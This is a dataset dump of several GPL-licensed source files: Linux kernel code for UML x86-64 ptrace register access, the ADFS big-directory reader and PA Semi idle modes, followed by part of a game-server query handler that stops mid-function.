	iic_ir |= CBE_IIC_IR_PRIO(priority) |
		  CBE_IIC_IR_DEST_NODE(node);
	if (thread == 0)
		iic_ir |= CBE_IIC_IR_DEST_UNIT(CBE_IIC_IR_PT_0);
	else
		iic_ir |= CBE_IIC_IR_DEST_UNIT(CBE_IIC_IR_PT_1);
	out_be64(&iic_regs->iic_ir, iic_ir);
}
| gpl-2.0 |
samarthp/sam-tenderloin-kernel-3.4 | arch/x86/um/ptrace_64.c | 8705 | 5781 | /*
* Copyright 2003 PathScale, Inc.
* Copyright (C) 2003 - 2007 Jeff Dike (jdike@{addtoit,linux.intel}.com)
*
* Licensed under the GPL
*/
#include <linux/mm.h>
#include <linux/sched.h>
#include <linux/errno.h>
#define __FRAME_OFFSETS
#include <asm/ptrace.h>
#include <asm/uaccess.h>
/*
 * determines which flags the user has access to.
 * 1 = access 0 = no access
 */
#define FLAG_MASK 0x44dd5UL
/* Map PT_REGS byte offsets (index = offset >> 3) to host register
 * slots in thread.regs.regs.gp[]. */
static const int reg_offsets[] =
{
	[R8 >> 3] = HOST_R8,
	[R9 >> 3] = HOST_R9,
	[R10 >> 3] = HOST_R10,
	[R11 >> 3] = HOST_R11,
	[R12 >> 3] = HOST_R12,
	[R13 >> 3] = HOST_R13,
	[R14 >> 3] = HOST_R14,
	[R15 >> 3] = HOST_R15,
	[RIP >> 3] = HOST_IP,
	[RSP >> 3] = HOST_SP,
	[RAX >> 3] = HOST_AX,
	[RBX >> 3] = HOST_BX,
	[RCX >> 3] = HOST_CX,
	[RDX >> 3] = HOST_DX,
	[RSI >> 3] = HOST_SI,
	[RDI >> 3] = HOST_DI,
	[RBP >> 3] = HOST_BP,
	[CS >> 3] = HOST_CS,
	[SS >> 3] = HOST_SS,
	[FS_BASE >> 3] = HOST_FS_BASE,
	[GS_BASE >> 3] = HOST_GS_BASE,
	[DS >> 3] = HOST_DS,
	[ES >> 3] = HOST_ES,
	[FS >> 3] = HOST_FS,
	[GS >> 3] = HOST_GS,
	[EFLAGS >> 3] = HOST_EFLAGS,
	[ORIG_RAX >> 3] = HOST_ORIG_AX,
};
/*
 * Store a user-supplied register value into the child's saved register
 * set, validating segment selectors, base addresses and flag bits.
 * Returns 0 on success or -EIO for an invalid value.
 */
int putreg(struct task_struct *child, int regno, unsigned long value)
{
#ifdef TIF_IA32
	/*
	 * Some code in the 64bit emulation may not be 64bit clean.
	 * Don't take any chances.
	 */
	if (test_tsk_thread_flag(child, TIF_IA32))
		value &= 0xffffffff;
#endif
	switch (regno) {
	case R8:
	case R9:
	case R10:
	case R11:
	case R12:
	case R13:
	case R14:
	case R15:
	case RIP:
	case RSP:
	case RAX:
	case RBX:
	case RCX:
	case RDX:
	case RSI:
	case RDI:
	case RBP:
	case ORIG_RAX:
		/* general-purpose registers are stored unchecked */
		break;
	case FS:
	case GS:
	case DS:
	case ES:
	case SS:
	case CS:
		/* selectors must be null or have RPL 3 (user mode) */
		if (value && (value & 3) != 3)
			return -EIO;
		value &= 0xffff;
		break;
	case FS_BASE:
	case GS_BASE:
		/* base addresses must be canonical */
		if (!((value >> 48) == 0 || (value >> 48) == 0xffff))
			return -EIO;
		break;
	case EFLAGS:
		value &= FLAG_MASK;
		/* NOTE(review): this only ORs the new bits in, so a flag
		 * bit once set through ptrace is never cleared by a later
		 * putreg -- confirm this is intended. */
		child->thread.regs.regs.gp[HOST_EFLAGS] |= value;
		return 0;
	default :
		panic("Bad register in putreg(): %d\n", regno);
	}
	child->thread.regs.regs.gp[reg_offsets[regno >> 3]] = value;
	return 0;
}
/*
 * PTRACE_POKEUSR backend: write one word of the child's USER area,
 * either a saved register (via putreg) or a debug register slot.
 */
int poke_user(struct task_struct *child, long addr, long data)
{
	if ((addr & 3) || addr < 0)
		return -EIO;
	if (addr < MAX_REG_OFFSET)
		return putreg(child, addr, data);
	else if ((addr >= offsetof(struct user, u_debugreg[0])) &&
		(addr <= offsetof(struct user, u_debugreg[7]))) {
		addr -= offsetof(struct user, u_debugreg[0]);
		/* NOTE(review): scales the byte offset by 4; u_debugreg
		 * entries are longs, so verify this indexing matches the
		 * 64-bit struct user layout (peek_user uses the same
		 * scaling, so the pair is at least self-consistent). */
		addr = addr >> 2;
		/* DR4 and DR5 are reserved */
		if ((addr == 4) || (addr == 5))
			return -EIO;
		child->thread.arch.debugregs[addr] = data;
		return 0;
	}
	return -EIO;
}
/*
 * Read one saved register of the child, masked to the width the
 * tracer is allowed to see (32 bits for IA32 tasks, 16 for selectors).
 */
unsigned long getreg(struct task_struct *child, int regno)
{
	unsigned long mask = ~0UL;
#ifdef TIF_IA32
	if (test_tsk_thread_flag(child, TIF_IA32))
		mask = 0xffffffff;
#endif
	switch (regno) {
	case R8:
	case R9:
	case R10:
	case R11:
	case R12:
	case R13:
	case R14:
	case R15:
	case RIP:
	case RSP:
	case RAX:
	case RBX:
	case RCX:
	case RDX:
	case RSI:
	case RDI:
	case RBP:
	case ORIG_RAX:
	case EFLAGS:
	case FS_BASE:
	case GS_BASE:
		break;
	case FS:
	case GS:
	case DS:
	case ES:
	case SS:
	case CS:
		/* segment selectors are 16 bits wide */
		mask = 0xffff;
		break;
	default:
		panic("Bad register in getreg: %d\n", regno);
	}
	return mask & child->thread.regs.regs.gp[reg_offsets[regno >> 3]];
}
/*
 * PTRACE_PEEKUSR backend: read one word of the child's USER area
 * (register or debug register) and copy it out to @data.
 */
int peek_user(struct task_struct *child, long addr, long data)
{
	/* read the word at location addr in the USER area. */
	unsigned long tmp;
	if ((addr & 3) || addr < 0)
		return -EIO;
	tmp = 0;  /* Default return condition */
	if (addr < MAX_REG_OFFSET)
		tmp = getreg(child, addr);
	else if ((addr >= offsetof(struct user, u_debugreg[0])) &&
		(addr <= offsetof(struct user, u_debugreg[7]))) {
		addr -= offsetof(struct user, u_debugreg[0]);
		/* NOTE(review): same ">> 2" offset scaling as poke_user --
		 * verify against the 64-bit struct user layout. */
		addr = addr >> 2;
		tmp = child->thread.arch.debugregs[addr];
	}
	return put_user(tmp, (unsigned long *) data);
}
/* XXX Mostly copied from sys-i386 */
int is_syscall(unsigned long addr)
{
	unsigned short instr;
	int copied;

	copied = copy_from_user(&instr, (void __user *) addr, sizeof(instr));
	if (copied) {
		/*
		 * access_process_vm() grants access to vsyscall and stub,
		 * while copy_from_user doesn't. Maybe access_process_vm is
		 * slow, but that doesn't matter, since it will be called only
		 * in case of singlestepping, if copy_from_user failed.
		 */
		copied = access_process_vm(current, addr, &instr,
					   sizeof(instr), 0);
		if (copied != sizeof(instr)) {
			printk("is_syscall : failed to read instruction from "
			       "0x%lx\n", addr);
			return 1;
		}
	}
	/* 0x050f read little-endian is the two-byte sequence 0f 05,
	 * i.e. the x86-64 "syscall" instruction */
	return instr == 0x050f;
}
/*
 * Copy the child's FPU register image from the host process that backs
 * it out to the tracer's buffer.  Returns 0 or a negative errno.
 */
static int get_fpregs(struct user_i387_struct __user *buf, struct task_struct *child)
{
	int err, n, cpu = ((struct thread_info *) child->stack)->cpu;
	long fpregs[HOST_FP_SIZE];
	/* the user-visible layout must match the host save area */
	BUG_ON(sizeof(*buf) != sizeof(fpregs));
	err = save_fp_registers(userspace_pid[cpu], fpregs);
	if (err)
		return err;
	n = copy_to_user(buf, fpregs, sizeof(fpregs));
	if (n > 0)
		return -EFAULT;
	return n;
}
/*
 * Copy an FPU register image from the tracer's buffer into the host
 * process that backs the child.  Returns 0 or a negative errno.
 */
static int set_fpregs(struct user_i387_struct __user *buf, struct task_struct *child)
{
	int n, cpu = ((struct thread_info *) child->stack)->cpu;
	long fpregs[HOST_FP_SIZE];
	/* the user-visible layout must match the host save area */
	BUG_ON(sizeof(*buf) != sizeof(fpregs));
	n = copy_from_user(fpregs, buf, sizeof(fpregs));
	if (n > 0)
		return -EFAULT;
	return restore_fp_registers(userspace_pid[cpu], fpregs);
}
/*
 * Handle the x86-64-specific ptrace requests; anything unrecognised
 * returns -EIO so the generic code can report failure.
 */
long subarch_ptrace(struct task_struct *child, long request,
		    unsigned long addr, unsigned long data)
{
	int ret = -EIO;
	void __user *datap = (void __user *) data;

	switch (request) {
	case PTRACE_GETFPREGS: /* Get the child FPU state. */
		ret = get_fpregs(datap, child);
		break;
	case PTRACE_SETFPREGS: /* Set the child FPU state. */
		ret = set_fpregs(datap, child);
		break;
	case PTRACE_ARCH_PRCTL:
		/* XXX Calls ptrace on the host - needs some SMP thinking */
		ret = arch_prctl(child, data, (void __user *) addr);
		break;
	}
	return ret;
}
| gpl-2.0 |
CyanogenMod/android_kernel_sony_msm7x27a-legacy | fs/adfs/dir_fplus.c | 11009 | 6392 | /*
* linux/fs/adfs/dir_fplus.c
*
* Copyright (C) 1997-1999 Russell King
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/buffer_head.h>
#include <linux/slab.h>
#include "adfs.h"
#include "dir_fplus.h"
/*
 * Read and validate an ADFS "big directory" object @id of @sz bytes
 * into @dir, collecting one buffer_head per filesystem block.  Uses
 * the small fixed bh array inside struct adfs_dir when it fits and
 * allocates a larger array otherwise.  Returns 0 on success, -EIO on
 * any I/O or consistency failure (all buffers released).
 */
static int
adfs_fplus_read(struct super_block *sb, unsigned int id, unsigned int sz, struct adfs_dir *dir)
{
	struct adfs_bigdirheader *h;
	struct adfs_bigdirtail *t;
	unsigned long block;
	unsigned int blk, size;
	int i, ret = -EIO;
	dir->nr_buffers = 0;
	/* start off using fixed bh set - only alloc for big dirs */
	dir->bh_fplus = &dir->bh[0];
	block = __adfs_block_map(sb, id, 0);
	if (!block) {
		adfs_error(sb, "dir object %X has a hole at offset 0", id);
		goto out;
	}
	dir->bh_fplus[0] = sb_bread(sb, block);
	if (!dir->bh_fplus[0])
		goto out;
	dir->nr_buffers += 1;
	h = (struct adfs_bigdirheader *)dir->bh_fplus[0]->b_data;
	size = le32_to_cpu(h->bigdirsize);
	/* a size mismatch is only warned about; the header's own size
	 * field is what we trust below */
	if (size != sz) {
		printk(KERN_WARNING "adfs: adfs_fplus_read:"
					" directory header size %X\n"
					" does not match directory size %X\n",
					size, sz);
	}
	/* sanity-check version, alignment and start marker */
	if (h->bigdirversion[0] != 0 || h->bigdirversion[1] != 0 ||
	    h->bigdirversion[2] != 0 || size & 2047 ||
	    h->bigdirstartname != cpu_to_le32(BIGDIRSTARTNAME)) {
		printk(KERN_WARNING "adfs: dir object %X has"
					" malformed dir header\n", id);
		goto out;
	}
	size >>= sb->s_blocksize_bits;
	if (size > sizeof(dir->bh)/sizeof(dir->bh[0])) {
		/* this directory is too big for fixed bh set, must allocate */
		struct buffer_head **bh_fplus =
			kzalloc(size * sizeof(struct buffer_head *),
				GFP_KERNEL);
		if (!bh_fplus) {
			adfs_error(sb, "not enough memory for"
					" dir object %X (%d blocks)", id, size);
			goto out;
		}
		dir->bh_fplus = bh_fplus;
		/* copy over the pointer to the block that we've already read */
		dir->bh_fplus[0] = dir->bh[0];
	}
	/* read the remaining blocks of the directory */
	for (blk = 1; blk < size; blk++) {
		block = __adfs_block_map(sb, id, blk);
		if (!block) {
			adfs_error(sb, "dir object %X has a hole at offset %d", id, blk);
			goto out;
		}
		dir->bh_fplus[blk] = sb_bread(sb, block);
		if (!dir->bh_fplus[blk]) {
			adfs_error(sb,	"dir object %X failed read for"
					" offset %d, mapped block %X",
					id, blk, block);
			goto out;
		}
		dir->nr_buffers += 1;
	}
	/* the tail occupies the last 8 bytes of the final block */
	t = (struct adfs_bigdirtail *)
		(dir->bh_fplus[size - 1]->b_data + (sb->s_blocksize - 8));
	/* validate the end marker and sequence number */
	if (t->bigdirendname != cpu_to_le32(BIGDIRENDNAME) ||
	    t->bigdirendmasseq != h->startmasseq ||
	    t->reserved[0] != 0 || t->reserved[1] != 0) {
		printk(KERN_WARNING "adfs: dir object %X has "
					"malformed dir end\n", id);
		goto out;
	}
	dir->parent_id = le32_to_cpu(h->bigdirparent);
	dir->sb = sb;
	return 0;
out:
	/* release everything we read and reset the dir state */
	if (dir->bh_fplus) {
		for (i = 0; i < dir->nr_buffers; i++)
			brelse(dir->bh_fplus[i]);
		if (&dir->bh[0] != dir->bh_fplus)
			kfree(dir->bh_fplus);
		dir->bh_fplus = NULL;
	}
	dir->nr_buffers = 0;
	dir->sb = NULL;
	return ret;
}
/*
 * Seek the directory cursor to entry index @fpos.
 * Returns 0 on success, -ENOENT if @fpos is past the last entry.
 */
static int
adfs_fplus_setpos(struct adfs_dir *dir, unsigned int fpos)
{
	struct adfs_bigdirheader *h =
		(struct adfs_bigdirheader *) dir->bh_fplus[0]->b_data;

	if (fpos > le32_to_cpu(h->bigdirentries))
		return -ENOENT;

	dir->pos = fpos;
	return 0;
}
/*
 * Copy @len bytes starting at directory byte @offset into @to,
 * handling a copy that straddles at most one block boundary.
 */
static void
dir_memcpy(struct adfs_dir *dir, unsigned int offset, void *to, int len)
{
	struct super_block *sb = dir->sb;
	unsigned int blk, off, avail;
	char *dst = to;

	blk = offset >> sb->s_blocksize_bits;
	off = offset & (sb->s_blocksize - 1);
	avail = sb->s_blocksize - off;

	if (len <= avail) {
		/* entirely within one block */
		memcpy(dst, dir->bh_fplus[blk]->b_data + off, len);
		return;
	}

	/* first part from this block, remainder from the next one */
	memcpy(dst, dir->bh_fplus[blk]->b_data + off, avail);
	memcpy(dst + avail, dir->bh_fplus[blk + 1]->b_data, len - avail);
}
/*
 * Read the directory entry at the current cursor into @obj and advance
 * the cursor.  Returns 0 on success, -ENOENT at end of directory.
 */
static int
adfs_fplus_getnext(struct adfs_dir *dir, struct object_info *obj)
{
	struct adfs_bigdirheader *h =
		(struct adfs_bigdirheader *) dir->bh_fplus[0]->b_data;
	struct adfs_bigdirentry bde;
	unsigned int offset;
	int i, ret = -ENOENT;
	if (dir->pos >= le32_to_cpu(h->bigdirentries))
		goto out;
	/* entry table starts after the word-aligned directory name */
	offset = offsetof(struct adfs_bigdirheader, bigdirname);
	offset += ((le32_to_cpu(h->bigdirnamelen) + 4) & ~3);
	offset += dir->pos * sizeof(struct adfs_bigdirentry);
	dir_memcpy(dir, offset, &bde, sizeof(struct adfs_bigdirentry));
	obj->loadaddr = le32_to_cpu(bde.bigdirload);
	obj->execaddr = le32_to_cpu(bde.bigdirexec);
	obj->size     = le32_to_cpu(bde.bigdirlen);
	obj->file_id  = le32_to_cpu(bde.bigdirindaddr);
	obj->attr     = le32_to_cpu(bde.bigdirattr);
	obj->name_len = le32_to_cpu(bde.bigdirobnamelen);
	/* the name heap follows the entry table; bigdirobnameptr is an
	 * offset into it */
	offset = offsetof(struct adfs_bigdirheader, bigdirname);
	offset += ((le32_to_cpu(h->bigdirnamelen) + 4) & ~3);
	offset += le32_to_cpu(h->bigdirentries) * sizeof(struct adfs_bigdirentry);
	offset += le32_to_cpu(bde.bigdirobnameptr);
	dir_memcpy(dir, offset, obj->name, obj->name_len);
	/* RISC OS uses '/' where Linux uses '.'; translate */
	for (i = 0; i < obj->name_len; i++)
		if (obj->name[i] == '/')
			obj->name[i] = '.';
	obj->filetype = -1;
	/*
	 * object is a file and is filetyped and timestamped?
	 * RISC OS 12-bit filetype is stored in load_address[19:8]
	 */
	if ((0 == (obj->attr & ADFS_NDA_DIRECTORY)) &&
		(0xfff00000 == (0xfff00000 & obj->loadaddr))) {
		obj->filetype = (__u16) ((0x000fff00 & obj->loadaddr) >> 8);
		/* optionally append the ,xyz hex filetype suffix */
		if (ADFS_SB(dir->sb)->s_ftsuffix)
			obj->name_len +=
				append_filetype_suffix(
					&obj->name[obj->name_len],
					obj->filetype);
	}
	dir->pos += 1;
	ret = 0;
out:
	return ret;
}
/*
 * Force all of the directory's dirty buffers to disk.  Returns 0 on
 * success or -EIO if any buffer failed to write back.
 */
static int
adfs_fplus_sync(struct adfs_dir *dir)
{
	int ret = 0;
	int idx;

	for (idx = dir->nr_buffers - 1; idx >= 0; idx--) {
		struct buffer_head *bh = dir->bh_fplus[idx];

		sync_dirty_buffer(bh);
		/* A buffer that was submitted but never came back
		 * up-to-date indicates a write error. */
		if (buffer_req(bh) && !buffer_uptodate(bh))
			ret = -EIO;
	}

	return ret;
}
/*
 * Release every buffer reference held by the directory and reset its
 * bookkeeping fields.  Safe to call on a partially-initialized dir.
 */
static void
adfs_fplus_free(struct adfs_dir *dir)
{
	int n;

	if (dir->bh_fplus) {
		for (n = 0; n < dir->nr_buffers; n++)
			brelse(dir->bh_fplus[n]);

		/* The array is only heap-allocated when it did not fit
		 * in the small inline dir->bh[] array. */
		if (dir->bh_fplus != &dir->bh[0])
			kfree(dir->bh_fplus);
		dir->bh_fplus = NULL;
	}

	dir->nr_buffers = 0;
	dir->sb = NULL;
}
/* Directory operations for new-format ("F+"/BigDir) ADFS directories. */
struct adfs_dir_ops adfs_fplus_dir_ops = {
	.read		= adfs_fplus_read,
	.setpos		= adfs_fplus_setpos,
	.getnext	= adfs_fplus_getnext,
	.sync		= adfs_fplus_sync,
	.free		= adfs_fplus_free
};
| gpl-2.0 |
VeryLettuce/LG_F120K_Kernel | arch/powerpc/platforms/pasemi/idle.c | 13569 | 2410 | /*
* Copyright (C) 2006-2007 PA Semi, Inc
*
* Maintained by: Olof Johansson <olof@lixom.net>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*/
#undef DEBUG
#include <linux/kernel.h>
#include <linux/string.h>
#include <linux/irq.h>
#include <asm/machdep.h>
#include <asm/reg.h>
#include <asm/smp.h>
#include "pasemi.h"
/* A selectable power-saving idle mode: a human-readable name plus the
 * low-level routine that enters that mode. */
struct sleep_mode {
	char *name;
	void (*entry)(void);
};
/* Available idle modes; selected via the "idle=" boot parameter. */
static struct sleep_mode modes[] = {
	{ .name = "spin", .entry = &idle_spin },
	{ .name = "doze", .entry = &idle_doze },
};

/* Index into modes[]; defaults to 0 ("spin"). */
static int current_mode = 0;
/*
 * System-reset exception handler.  On this platform, wakeup from a
 * power-saving mode is delivered as a system reset with the wakeup
 * reason encoded in the SRR1 bits of MSR.  Returns 1 when the event
 * was handled here, 0 to fall through to a real system reset.
 */
static int pasemi_system_reset_exception(struct pt_regs *regs)
{
	/* If we were woken up from power savings, we need to return
	 * to the calling function, since nip is not saved across
	 * all modes.
	 */
	if (regs->msr & SRR1_WAKEMASK)
		regs->nip = regs->link;

	switch (regs->msr & SRR1_WAKEMASK) {
	case SRR1_WAKEEE:
		/* Woken by an external interrupt: dispatch it. */
		do_IRQ(regs);
		break;
	case SRR1_WAKEDEC:
		/* Woken by the decrementer (timer). */
		timer_interrupt(regs);
		break;
	default:
		/* do system reset */
		return 0;
	}

	/* Set higher astate since we come out of power savings at 0 */
	restore_astate(hard_smp_processor_id());

	/* everything handled */
	regs->msr |= MSR_RI;
	return 1;
}
/*
 * Install the PA6T idle loop: hook the system-reset handler (used for
 * wakeup) and the power_save entry point of the selected mode.
 */
static int __init pasemi_idle_init(void)
{
#ifndef CONFIG_PPC_PASEMI_CPUFREQ
	/* NOTE(review): presumably astate restoration after wakeup
	 * requires the cpufreq driver (see restore_astate()), so the
	 * safe "spin" mode is forced here -- confirm. */
	printk(KERN_WARNING "No cpufreq driver, powersavings modes disabled\n");
	current_mode = 0;
#endif

	ppc_md.system_reset_exception = pasemi_system_reset_exception;
	ppc_md.power_save = modes[current_mode].entry;
	printk(KERN_INFO "Using PA6T idle loop (%s)\n", modes[current_mode].name);

	return 0;
}
machine_late_initcall(pasemi, pasemi_idle_init);
/*
 * Parse the "idle=<mode>" early boot parameter and select the matching
 * entry in modes[].  Unknown mode names are silently ignored, leaving
 * the default in place.  Always returns 0 (parameter consumed).
 */
static int __init idle_param(char *p)
{
	/* unsigned index avoids a signed/unsigned comparison against
	 * ARRAY_SIZE(), which is a size_t */
	unsigned int i;

	for (i = 0; i < ARRAY_SIZE(modes); i++) {
		if (!strcmp(modes[i].name, p)) {
			current_mode = i;
			break;
		}
	}
	return 0;
}

early_param("idle", idle_param);
| gpl-2.0 |
InfinityCore/InfinityCore243 | src/server/game/Handlers/QueryHandler.cpp | 2 | 13906 | /*
* Copyright (C) 2008-2013 Trinitycore <http://www.trinitycore.org/>
* Copyright (C) 2009-2014 Infinitycore <http://www.infinitycore.org/>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "Common.h"
#include "Language.h"
#include "DatabaseEnv.h"
#include "WorldPacket.h"
#include "WorldSession.h"
#include "Opcodes.h"
#include "Log.h"
#include "World.h"
#include "ObjectMgr.h"
#include "Player.h"
#include "UpdateMask.h"
#include "NPCHandler.h"
#include "Pet.h"
#include "MapManager.h"
// Builds and sends SMSG_NAME_QUERY_RESPONSE for the character with the
// given GUID.  Name data comes from the world character-name cache;
// declined (grammatical-case) name forms are only available while the
// player is online, since they live on the Player object.
void WorldSession::SendNameQueryOpcode(uint64 guid)
{
    Player* player = ObjectAccessor::FindPlayer(guid);
    CharacterNameData const* nameData = sWorld->GetCharacterNameData(GUID_LOPART(guid));

    WorldPacket data(SMSG_NAME_QUERY_RESPONSE, (8+1+1+1+1+1+10));
    data.appendPackGUID(guid);
    if (!nameData)
    {
        data << uint8(1);                           // name unknown
        SendPacket(&data);
        return;
    }

    data << uint8(0);                               // name known
    data << nameData->m_name;                       // played name
    data << uint8(0);                               // realm name - only set for cross realm interaction (such as Battlegrounds)
    data << uint8(nameData->m_race);
    data << uint8(nameData->m_gender);
    data << uint8(nameData->m_class);

    if (DeclinedName const* names = (player ? player->GetDeclinedNames() : NULL))
    {
        data << uint8(1);                           // Name is declined
        for (uint8 i = 0; i < MAX_DECLINED_NAME_CASES; ++i)
            data << names->name[i];
    }
    else
        data << uint8(0);                           // Name is not declined
    SendPacket(&data);
}
// CMSG_NAME_QUERY: client requests name data for a character GUID;
// answer with SMSG_NAME_QUERY_RESPONSE.
void WorldSession::HandleNameQueryOpcode(WorldPacket& recvData)
{
    uint64 targetGuid;
    recvData >> targetGuid;

    // Logging is intentionally disabled here to avoid console spam.
    SendNameQueryOpcode(targetGuid);
}
// CMSG_QUERY_TIME: the payload is ignored; just send the server time.
void WorldSession::HandleQueryTimeOpcode(WorldPacket & /*recvData*/)
{
    SendQueryTimeResponse();
}
// Sends SMSG_QUERY_TIME_RESPONSE: current server time and the number of
// seconds until the next daily quest reset.
void WorldSession::SendQueryTimeResponse()
{
    // Sample the clock once so both fields are mutually consistent even
    // if a second boundary is crossed while building the packet (the
    // original called time(NULL) twice).
    time_t now = time(NULL);

    WorldPacket data(SMSG_QUERY_TIME_RESPONSE, 4+4);
    data << uint32(now);
    data << uint32(sWorld->GetNextDailyQuestsResetTime() - now);
    SendPacket(&data);
}
/// Only _static_ data is sent in this packet !!!
// CMSG_CREATURE_QUERY: reply with the (locale-overlaid) creature
// template for the requested entry, or with entry|0x80000000 when no
// template exists so the client knows the query failed.
void WorldSession::HandleCreatureQueryOpcode(WorldPacket& recvData)
{
    uint32 entry;
    recvData >> entry;
    uint64 guid;
    recvData >> guid;                                   // only used for logging

    CreatureTemplate const* ci = sObjectMgr->GetCreatureTemplate(entry);
    if (ci)
    {
        std::string Name, SubName;
        Name = ci->Name;
        SubName = ci->SubName;

        // Overlay localized strings for this session's locale, if any.
        int loc_idx = GetSessionDbLocaleIndex();
        if (loc_idx >= 0)
        {
            if (CreatureLocale const* cl = sObjectMgr->GetCreatureLocale(entry))
            {
                ObjectMgr::GetLocaleString(cl->Name, loc_idx, Name);
                ObjectMgr::GetLocaleString(cl->SubName, loc_idx, SubName);
            }
        }
        IC_LOG_DEBUG("network", "WORLD: CMSG_CREATURE_QUERY '%s' - Entry: %u.", ci->Name.c_str(), entry);
                                                        // guess size
        WorldPacket data(SMSG_CREATURE_QUERY_RESPONSE, 100);
        data << uint32(entry);                          // creature entry
        data << Name;
        data << uint8(0) << uint8(0) << uint8(0);       // name2, name3, name4, always empty
        data << SubName;
        data << ci->IconName;                           // "Directions" for guard, string for Icons 2.3.0
        data << uint32(ci->type_flags);                 // flags
        data << uint32(ci->type);                       // CreatureType.dbc
        data << uint32(ci->family);                     // CreatureFamily.dbc
        data << uint32(ci->rank);                       // Creature Rank (elite, boss, etc)
        data << uint32(ci->KillCredit[0]);              // new in 3.1, kill credit
        data << uint32(ci->KillCredit[1]);              // new in 3.1, kill credit
        data << uint32(ci->Modelid1);                   // Modelid1
        data << uint32(ci->Modelid2);                   // Modelid2
        data << uint32(ci->Modelid3);                   // Modelid3
        data << uint32(ci->Modelid4);                   // Modelid4
        data << float(ci->ModHealth);                   // dmg/hp modifier
        data << float(ci->ModMana);                     // dmg/mana modifier
        data << uint8(ci->RacialLeader);
        for (uint32 i = 0; i < MAX_CREATURE_QUEST_ITEMS; ++i)
            data << uint32(ci->questItems[i]);          // itemId[6], quest drop
        data << uint32(ci->movementId);                 // CreatureMovementInfo.dbc
        SendPacket(&data);
        IC_LOG_DEBUG("network", "WORLD: Sent SMSG_CREATURE_QUERY_RESPONSE");
    }
    else
    {
        IC_LOG_DEBUG("network", "WORLD: CMSG_CREATURE_QUERY - NO CREATURE INFO! (GUID: %u, ENTRY: %u)",
            GUID_LOPART(guid), entry);
        // High bit set signals "no data for this entry" to the client.
        WorldPacket data(SMSG_CREATURE_QUERY_RESPONSE, 4);
        data << uint32(entry | 0x80000000);
        SendPacket(&data);
        IC_LOG_DEBUG("network", "WORLD: Sent SMSG_CREATURE_QUERY_RESPONSE");
    }
}
/// Only _static_ data is sent in this packet !!!
// CMSG_GAMEOBJECT_QUERY: reply with the (locale-overlaid) gameobject
// template for the requested entry, or entry|0x80000000 on failure.
void WorldSession::HandleGameObjectQueryOpcode(WorldPacket& recvData)
{
    uint32 entry;
    recvData >> entry;
    uint64 guid;
    recvData >> guid;                                   // only used for logging

    const GameObjectTemplate* info = sObjectMgr->GetGameObjectTemplate(entry);
    if (info)
    {
        std::string Name;
        std::string IconName;
        std::string CastBarCaption;
        Name = info->name;
        IconName = info->IconName;
        CastBarCaption = info->castBarCaption;

        // Overlay localized strings for this session's locale, if any.
        int loc_idx = GetSessionDbLocaleIndex();
        if (loc_idx >= 0)
        {
            if (GameObjectLocale const* gl = sObjectMgr->GetGameObjectLocale(entry))
            {
                ObjectMgr::GetLocaleString(gl->Name, loc_idx, Name);
                ObjectMgr::GetLocaleString(gl->CastBarCaption, loc_idx, CastBarCaption);
            }
        }
        IC_LOG_DEBUG("network", "WORLD: CMSG_GAMEOBJECT_QUERY '%s' - Entry: %u. ", info->name.c_str(), entry);
        WorldPacket data (SMSG_GAMEOBJECT_QUERY_RESPONSE, 150);
        data << uint32(entry);
        data << uint32(info->type);
        data << uint32(info->displayId);
        data << Name;
        data << uint8(0) << uint8(0) << uint8(0);       // name2, name3, name4
        data << IconName;                               // 2.0.3, string. Icon name to use instead of default icon for go's (ex: "Attack" makes sword)
        data << CastBarCaption;                         // 2.0.3, string. Text will appear in Cast Bar when using GO (ex: "Collecting")
        data << info->unk1;                             // 2.0.3, string
        data.append(info->raw.data, MAX_GAMEOBJECT_DATA);
        data << float(info->size);                      // go size
        for (uint32 i = 0; i < MAX_GAMEOBJECT_QUEST_ITEMS; ++i)
            data << uint32(info->questItems[i]);        // itemId[6], quest drop
        SendPacket(&data);
        IC_LOG_DEBUG("network", "WORLD: Sent SMSG_GAMEOBJECT_QUERY_RESPONSE");
    }
    else
    {
        IC_LOG_DEBUG("network", "WORLD: CMSG_GAMEOBJECT_QUERY - Missing gameobject info for (GUID: %u, ENTRY: %u)",
            GUID_LOPART(guid), entry);
        // High bit set signals "no data for this entry" to the client.
        WorldPacket data (SMSG_GAMEOBJECT_QUERY_RESPONSE, 4);
        data << uint32(entry | 0x80000000);
        SendPacket(&data);
        IC_LOG_DEBUG("network", "WORLD: Sent SMSG_GAMEOBJECT_QUERY_RESPONSE");
    }
}
// MSG_CORPSE_QUERY: tell the client where its corpse is.  If the corpse
// lies in a dungeon on a different map, report the dungeon's entrance
// coordinates instead so the client can display a usable map marker,
// while corpsemapid still carries the real corpse map.
void WorldSession::HandleCorpseQueryOpcode(WorldPacket & /*recvData*/)
{
    IC_LOG_DEBUG("network", "WORLD: Received MSG_CORPSE_QUERY");

    Corpse* corpse = GetPlayer()->GetCorpse();

    if (!corpse)
    {
        WorldPacket data(MSG_CORPSE_QUERY, 1);
        data << uint8(0);                               // corpse not found
        SendPacket(&data);
        return;
    }

    uint32 mapid = corpse->GetMapId();
    float x = corpse->GetPositionX();
    float y = corpse->GetPositionY();
    float z = corpse->GetPositionZ();
    uint32 corpsemapid = mapid;                         // keep the real corpse map before any rewrite below

    // if corpse at different map
    if (mapid != _player->GetMapId())
    {
        // search entrance map for proper show entrance
        if (MapEntry const* corpseMapEntry = sMapStore.LookupEntry(mapid))
        {
            if (corpseMapEntry->IsDungeon() && corpseMapEntry->entrance_map >= 0)
            {
                // if corpse map have entrance
                if (Map const* entranceMap = sMapMgr->CreateBaseMap(corpseMapEntry->entrance_map))
                {
                    mapid = corpseMapEntry->entrance_map;
